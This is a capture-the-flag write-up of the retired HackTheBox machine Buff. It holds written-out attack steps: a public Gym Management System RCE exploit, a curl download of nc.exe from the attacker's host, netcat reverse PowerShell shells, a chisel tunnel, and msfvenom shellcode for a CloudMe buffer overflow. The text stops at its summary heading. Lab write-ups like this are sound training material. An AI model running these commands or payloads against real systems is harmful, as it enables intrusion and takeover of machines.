Writeup: HackTheBox Buff Machine

Note: Only write-ups of retired HTB machines are allowed. The machine in this article, named Buff, is retired.

Machine Info

1. TLDR

Remote graph

2. Preparation

I have prepared some useful variables:

export IP=10.10.10.198

3. Scanning and Reconnaissance

For starters, I used the nmap utility to identify open ports:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $nmap -sC -sV -Pn -n $IP -T4 -oN nmap/01-initial.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 17:48 CEST
Nmap scan report for 10.10.10.198
Host is up (0.12s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.81 seconds

Scanning with nmap revealed an http service running on port 8080. I tried using a browser and testing the HTTP server. A website of a company operating in the fitness industry was hosted on the machine:

Buff Fitness Webpage

A quick look at the source of the page to reveal any useful comments left was to no avail. So I launched the gobuster and nikto tools.

┌─[✗]─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $gobuster dir -u http://$IP:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,htm,txt | tee gobuster/01-php.txt
┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $nikto -h $IP -port=8080 --nossl | tee nikto/01-initial.txt

While waiting for the scan results, I started to explore the site using a browser. I came to the /contact.php page where I found the information:

Buff Webpage Gym Software

4. Gaining access

I used the searchsploit tool:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $searchsploit -s Gym Management
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                         | php/webapps/48506.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

To prepare an exploit, I made a copy of its template:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $cp /usr/share/exploitdb/exploits/php/webapps/48506.py gymexploit.py

and ran the exploit and connected:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $python2 gymexploit.py http://$IP:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun

I prepared a copy of nc.exe for download:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $cp /usr/share/windows-resources/binaries/nc.exe ./74wny0wl.exe

Then I started the web server:

┌─[✗]─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Next, I prepared to make a connection:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $sudo nc -nvlp 443
listening on [any] 443 ...

and finally downloaded a copy of nc.exe and made a connection:

C:\xampp\htdocs\gym\upload> curl http://10.10.14.20/74wny0wl.exe > C:\Users\shaun\AppData\Local\74wny0wl.exe
�PNG
�

C:\xampp\htdocs\gym\upload> C:\Users\shaun\AppData\Local\74wny0wl.exe 10.10.14.20 443 -e powershell.exe

It remains to read the flag:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.198] 50569
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs\gym\upload> type C:\Users\shaun\Desktop\user.txt
type C:\Users\shaun\Desktop\user.txt
d1b29b3539c417bd49e03ba00d599150

5. Privilege Escalation

Near the flagged directory in the C:\Users\shaun\Downloads directory I found the file CloudMe_1112.exe

PS C:\Users\shaun\Downloads> ls
ls


    Directory: C:\Users\shaun\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       16/06/2020     16:26       17830824 CloudMe_1112.exe

CloudMe Sync is an application to sync local files to the cloud. By default, it listens on port 8888.

In order to verify the launch of the application, I reviewed the list of processes:

PS C:\Users\shaun\Downloads> Get-Process cloud* | Format-Table
Get-Process cloud* | Format-Table

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                                                  
-------  ------    -----      -----     ------     --  -- -----------                                                  
    195      15    23928      25908              9260   0 CloudMe 

Then I searched the exploitdb database:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $searchsploit cloudme
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                                                                    | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                                                                           | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                                                                          | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)                                                                   | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)                                                            | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                                                                               | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                                                                           | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)                                                                  | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                                                                                   | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)                                                                | windows_x86-64/remote/44784.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

So I prepared a working copy of the exploit:

┌─[✗]─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $cp /usr/share/exploitdb/exploits/windows/remote/48389.py ./cloudmeexploit.py

I have modified the default IP address of the attacked machine in the cloudmeexploit.py script:

target = "10.10.10.198"

Then I generated a new payload, which I replaced in the cloudmeexploit.py file:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $msfvenom -p windows/exec CMD='C:\Users\shaun\AppData\Local\74wny0wl.exe 10.10.14.20 4444 -e powershell.exe' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 288 (iteration=0)
x86/shikata_ga_nai chosen with final size 288
Payload size: 288 bytes
Final size of python file: 1527 bytes
payload =  b""
payload += b"\xba\x6d\xe1\x42\xa7\xdb\xd8\xd9\x74\x24\xf4\x5d"
payload += b"\x33\xc9\xb1\x42\x83\xed\xfc\x31\x55\x0f\x03\x55"
payload += b"\x62\x03\xb7\x5b\x94\x41\x38\xa4\x64\x26\xb0\x41"
payload += b"\x55\x66\xa6\x02\xc5\x56\xac\x47\xe9\x1d\xe0\x73"
payload += b"\x7a\x53\x2d\x73\xcb\xde\x0b\xba\xcc\x73\x6f\xdd"
payload += b"\x4e\x8e\xbc\x3d\x6f\x41\xb1\x3c\xa8\xbc\x38\x6c"
payload += b"\x61\xca\xef\x81\x06\x86\x33\x29\x54\x06\x34\xce"
payload += b"\x2c\x29\x15\x41\x27\x70\xb5\x63\xe4\x08\xfc\x7b"
payload += b"\xe9\x35\xb6\xf0\xd9\xc2\x49\xd1\x10\x2a\xe5\x1c"
payload += b"\x9d\xd9\xf7\x59\x19\x02\x82\x93\x5a\xbf\x95\x67"
payload += b"\x21\x1b\x13\x7c\x81\xe8\x83\x58\x30\x3c\x55\x2a"
payload += b"\x3e\x89\x11\x74\x22\x0c\xf5\x0e\x5e\x85\xf8\xc0"
payload += b"\xd7\xdd\xde\xc4\xbc\x86\x7f\x5c\x18\x68\x7f\xbe"
payload += b"\xc3\xd5\x25\xb4\xe9\x02\x54\x97\x67\xd4\xea\xad"
payload += b"\xc5\xd6\xf4\xad\x79\xbf\xc5\x26\x16\xb8\xd9\xec"
payload += b"\x53\x36\x90\xad\xf5\xdf\x7d\x24\x44\x82\x7d\x92"
payload += b"\x8a\xbb\xfd\x17\x72\x38\x1d\x52\x77\x04\x99\x8e"
payload += b"\x05\x15\x4c\xb1\xba\x16\x45\xf2\x06\xb5\x33\x86"
payload += b"\x13\x37\xcf\x34\xa8\xdf\x4e\xb0\x20\x7c\xd0\x4a"
payload += b"\xcc\x38\xb3\xde\x4d\x9d\x7f\x70\xee\x7c\xec\xd2"
payload += b"\xc7\x4a\x9b\x84\x5e\x83\x14\x35\x8e\x86\xa2\xa0"
payload += b"\xee\x79\x63\x05\xdf\x49\xad\x68\x2b\x84\x83\xba"
payload += b"\x73\xec\xd7\x8e\x47\x2c\x35\x8a\x87\x5c\x2a\x23"
payload += b"\xa2\xee\xc7\xa3\x49\x63\x44\x1a\xf4\x03\xf1\x62"

I downloaded the chisel tool:

┌─[t4wny0wl@whitehatlab]─[/opt/chisel]
└──╼ $sudo wget https://github.com/jpillora/chisel/releases/download/v1.6.0/chisel_1.6.0_windows_amd64.gz
┌─[t4wny0wl@whitehatlab]─[/opt/chisel]
└──╼ $sudo wget https://github.com/jpillora/chisel/releases/download/v1.6.0/chisel_1.6.0_linux_amd64.gz
┌─[t4wny0wl@whitehatlab]─[/opt/chisel]
└──╼ $sudo gzip -d chisel_1.6.0_*
┌─[t4wny0wl@whitehatlab]─[/opt/chisel]
└──╼ $sudo mv chisel_1.6.0_windows_amd64 chisel_1.6.0_windows_amd64.exe
┌─[t4wny0wl@whitehatlab]─[/opt/chisel]
└──╼ $sudo chmod +x ./*
┌─[t4wny0wl@whitehatlab]─[/opt/chisel]
└──╼ $cp ./* ~/ctf/hackthebox/Machines/Windows/Buff/

and uploaded the chisel_1.6.0_windows_amd64.exe file to the server :

PS C:\xampp\htdocs\gym\upload> Invoke-WebRequest http://10.10.14.20/chisel_1.6.0_windows_amd64.exe -UseBasicParsing -OutFile C:\Users\shaun\AppData\Local\74wny0wlchisel.exe
Invoke-WebRequest http://10.10.14.20/chisel_1.6.0_windows_amd64.exe -UseBasicParsing -OutFile C:\Users\shaun\AppData\Local\74wny0wlchisel.exe

Then I started the server:

┌─[✗]─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $./chisel_1.6.0_linux_amd64 server --reverse --port 9001
2020/09/15 20:23:30 server: Reverse tunnelling enabled
2020/09/15 20:23:30 server: Fingerprint 13:f9:f3:21:91:0b:83:04:91:3b:d6:df:e6:22:38:0d
2020/09/15 20:23:30 server: Listening on 0.0.0.0:9001...

and the client:

PS C:\xampp\htdocs\gym\upload> C:\Users\shaun\AppData\Local\74wny0wlchisel.exe client 10.10.14.20:9001 R:8888:127.0.0.1:8888
C:\Users\shaun\AppData\Local\74wny0wlchisel.exe client 10.10.14.20:9001 R:8888:127.0.0.1:8888
2020/09/15 20:25:44 client: Connecting to ws://10.10.14.20:9001
2020/09/15 20:25:51 client: Fingerprint 13:f9:f3:21:91:0b:83:04:91:3b:d6:df:e6:22:38:0d
2020/09/15 20:25:51 client: Connected (Latency 36.8375ms)

After setting up the tunnel:

2020/09/15 20:25:51 server: proxy#1:R:0.0.0.0:8888=>127.0.0.1:8888: Listening

I ran the netcat tool:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $sudo nv -nvlp 4444
listening on [any] 4444 ...

and the cloudmeexploit.py script:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $python2 cloudmeexploit.py

As a result, a session was established:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff]
└──╼ $sudo nv -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.198] 50076
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
buff\administrator

It remains to read the flag from the root.txt file:

PS C:\Windows\system32> type C:\Users\administrator\Desktop\root.txt
type C:\Users\administrator\Desktop\root.txt
f098626c3fa18f40b811c19debf8becc

6. Summary

The following circumstances led to the capture of the flags: